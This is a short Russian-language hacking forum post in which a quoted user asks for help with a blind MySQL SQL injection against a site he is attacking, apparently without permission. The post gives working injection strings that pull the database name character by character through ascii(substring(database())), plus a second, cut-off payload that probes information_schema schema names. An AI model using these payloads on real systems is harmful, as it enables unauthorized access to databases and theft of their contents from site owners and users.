23.06.2012, 01:43
|
|
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
С нами:
7670486
Репутация:
76
|
|
[QUOTE="RuDefc0n"]
Собственно нид хелп...
Кручу один сайтец.
Собственно там mysql blind
Вот такими запросами вытащил имя базы/имя юзверя.
3183' /*!30000and ascii(substring((database()),7,1))=97 and*/ 'x'='x
А теперь вопрос:
3183' /*!30000and Length((select distinct schema_name from `information_schema`.schemata limit 0,1))
|
|
|